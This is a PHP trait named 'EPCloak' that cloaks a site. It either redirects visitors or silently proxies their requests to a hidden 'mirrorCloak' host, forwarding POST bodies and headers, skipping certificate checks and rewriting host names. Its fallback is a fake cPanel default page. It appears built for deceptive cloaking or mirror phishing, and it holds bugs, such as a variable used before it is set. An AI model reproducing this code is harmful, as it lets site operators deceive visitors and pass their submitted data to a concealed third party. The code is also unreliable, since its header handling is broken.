<?php
trait EPCloak {
    public function cloakGenerate($mirror = true, $code = 0) {
        $configuration = $this->configurationGetProps();
        if ($mirror == false) {
            if (isset($configuration['redirectURL'])) {
                if (!empty($configuration['redirectURL'])) {
                    die($this->redirect($configuration['redirectURL'], $code !== 0 ? $code : 301));
                    
                }
            }
        }
        if (!empty($configuration['mirrorCloak'] ?? '')) {
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $configuration['mirrorCloak'] . '/' . $_SERVER['REQUEST_URI']);
            curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
            curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
            if (($_SERVER['REQUEST_METHOD'] ?? '') == "POST") {
                curl_setopt($curl, CURLOPT_POST, true);
                curl_setopt($curl, CURLOPT_POSTFIELDS, file_get_contents('php://input'));
            }
            $blacklistedHttp = ['HTTP_HOST', 'HTTP_USER_AGENT'];
            $_ = [];
            foreach ($_SERVER as $key => $value) {
                if (!in_array(strtoupper($key), $blacklistedHttp) && strtolower(substr($key, strlen('http_'))) == "http_") $_[] = trim(strtolower(str_replace('_', '-', substr($key, strlen('http_'), strlen($key))))) . ': ' . $value;

            }
            curl_setopt($curl, CURLOPT_HTTPHEADER, $_);
            curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
            curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_HEADERFUNCTION, function($curl, $header) use (&$headers) {
                $len = strlen($header);
                $header = explode(':', $header, 2);
                $blacklisted = ['content-encoding', 'content-length'];
                if (count($header) < 2 || in_array(trim($header[0]), $blacklisted)) return $len;

                $header[1] = str_replace($parsedUrl['host'], $_SERVER['HTTP_HOST'], $header[1]);
                header(trim($header[0]) . ": " . trim($header[1]));
                return $len;
            });
            $result = curl_exec($curl);
            curl_close($curl);

            $parsedUrl = parse_url($configuration['mirrorCloak']);
            $result = str_replace($parsedUrl['host'], $_SERVER['HTTP_HOST'], $result);            

            die($result);
            return "";

        } else {
            $this->redirect('/cgi-sys/defaultwebpage.cgi');
            return "";
        }
    }
}